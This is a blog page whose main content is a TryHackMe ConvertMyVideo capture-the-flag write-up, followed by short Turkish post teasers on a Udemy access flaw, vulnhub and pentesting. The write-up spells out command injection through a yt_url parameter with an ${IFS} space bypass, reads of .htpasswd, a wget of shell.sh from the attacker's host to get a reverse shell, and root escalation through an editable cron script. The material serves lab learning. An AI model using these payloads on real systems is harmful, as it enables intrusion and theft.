TryHackMe — ConvertMyVideo

It’s a very good lab and you can test lots of different topics at the same time;

# I scan with nmap

sudo nmap -sV 10.10.124.59

# find web port to open and browse it;

# in parallel I start dirbsearch to find folders

sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404

# so first question answer we find quickly /admin folder our secret folder;

#so I understand basic Authentication and user credential need; I started password attack and also the as same time I started to web application testing

in Burp i start request manipulations ;

First thing i investigate yt_url part when i write

# |ls

i can execute my command, and after that, i think very simple room to solve;

#but after that i sent lots of Linux command and take every time to error; so i more create error and search from internet youtube-dl

# i find source code off youtube_dl

ytdl-org/youtube-dlyoutube-dl – download videos from youtube.com or other video platforms To install it right away for all UNIX users…github.com

# my test i every time took error about not true parameter and options; so when looked github page i saw valid options

# and send first option — help over burp

yt_url — help

and bingoo — help options worked for me; all help information i can saw in response ,

# after that step i try to send more powerful command which one help to reach my aim, and i spend 1,5 about that;

#main problem simple command like ls, id executed but when i try to execute ls -al every time take syntax errors; so i more focus sent command without space;

#Google best helper me search :

“How to send a command with arguments without spaces?”

How to send a command with arguments without spaces?Thanks for contributing an answer to Unix & Linux Stack Exchange! Please be sure to answer the question. Provide…unix.stackexchange.com

and find a true perspective

cat${IFS}file.txt

So using ${IFS} i can send command using without space; but before this job i send all my request burp repeater to more efficiently manipulation;

#please be careful that part because our parameter must be;

— version;ls${IFS}-al;

note: (- -) in the display looks like — and also you can use all option — help; — execute, — version

#so i can access all command that method; now i try to access /admin folder;

yt_url= — version;ls${IFS}/var/www/html/admin${IFS}-al;

# found .htpasswd and flag.txt

for reading flag.txt

yt_url= — version;cat${IFS}/var/www/html/admin/flag.txt;

and as the same method when you look to .htpasswd;

yt_url= — version;cat${IFS}/var/www/html/admin/.htpasswd;

you can find user;

Now i need to ever shell to execute for that reason i prepare bash based reverse shell.sh in my kali computer.

and start my kali

python -m SimpleHTTPServer 8090

and over burp vulnerable machine i try to install that file

yt_url= — version;wget${IFS}http://10.9.32.166:8090/shell.sh;

— version;chmod${IFS}755${IFS}/var/www/html/shell.sh;

so i installed and give execution permission after that i start in my kali nc to listen;

when over burp start shell.sh have shell 🙂

–version;bash${IFS}shell.sh;

#when i have console i look all method spend 2 hours and last i find one way only change; is there clean.sh script under temp folder; and some cronjob execute it periodically and editable from my self; (how can i know only CTF experience)

so i try to execute that command;

echo ‘ cat /root/root.txt >root-oldum’ >>clean.sh

and bingo i have root-oldum file as the same directory includes root.txt flag.

Super CTF Thank you overjt

Udemy Ucretli icerige ucretsiz erisim

Udemy gelistiricileri Turk olan , konu ve alanlarinda uzman olan yada uzman olduklarini dusununen kisiler tarafindan gelistirilen video egitim temelli kisisel gelisim platformudur. Site icerisinde ucretli ve ucretsiz bir cok harika icerige ulasabilirsiniz. Genel anlamda benimde cok kullandigim bir sitedir.

Yukarida kisaca sayfa hakkinda bir bilgilendirme gectikten sonra gelelim yazimizin ana konusuna.

Udemy sayfasi uzerinde parali icerikle satilan egitim serilerine hic bir ucret odemeden erismenizi sagliyacak surecsel ve mimarisel bir acigi sizlerle paylasacagim. Bu acik ile ilgili genel bilgilendirme Udemy security grubuna tarafimdan yapilmistir. Yazinin ilerleyen bolumlerinde bu surecide gorebilirsiniz.

Gelelim zafiyetminizin hayata gecirilmesine;

Okumaya devam et “Udemy Ucretli icerige ucretsiz erisim”

Pentest Labları

İşte size farklı amaçlar için derlenmiş orası burası patlak işletim sistemlerini, uygulamaları bulabileceğiniz bir site. Sitenin adında anlıyacağınız gibi gerek öğrenmek amaçlı, gerek eğlence amaçlı, gerekse seviyenizi test amaçlı bir çok güvenlik açığını test etmemizi sağlıyor.

Benim hoşuma gitti özellikle eğitimlerde kullanılabilinir bir çok imaj mevcut. Meraklılarına duyurulur.

http://vulnhub.com/

Rusyada CTF Yarışması ve Sonrası

Yazının başlığı biraz iddalı gelmiş olabilir. Ama pentester olarak mevcut tecrübelerimle Rusya’da aynı işi yapan kişileri ve ortamları kıyaslamak istedim.

Öncelikle inceleme ortamımdan biraz bahsetmek isterim aşağı yukarı iki senedir Rusya St. Petersburg’da yaşamaktayım. Burası Moskova’dan sonra Rusya’nın en haraketli ikinci şehri. Okuma oranı çok yüksek. Bilgisayar kullanım oranı devlet organlarında nerede ise sıfıra yakın, kişisel kullanım ise çok fazla. Okumaya devam et “Rusyada CTF Yarışması ve Sonrası”

Pentest Araçlarının Old School ve Modern Trendleri

Kullandığım, takip ettiğim ve sayfalardan gördüğüm kadarı ile Penteslerde kullanılan araçları iki farklı kategoriye ayırmak istedimç Belki old school tabiri tam istenilen anlamı verememiş olabilir ama benim anlatmak istediğim kullanılan araçlar ve popüleritenin değişen yüzü. Okumaya devam et “Pentest Araçlarının Old School ve Modern Trendleri”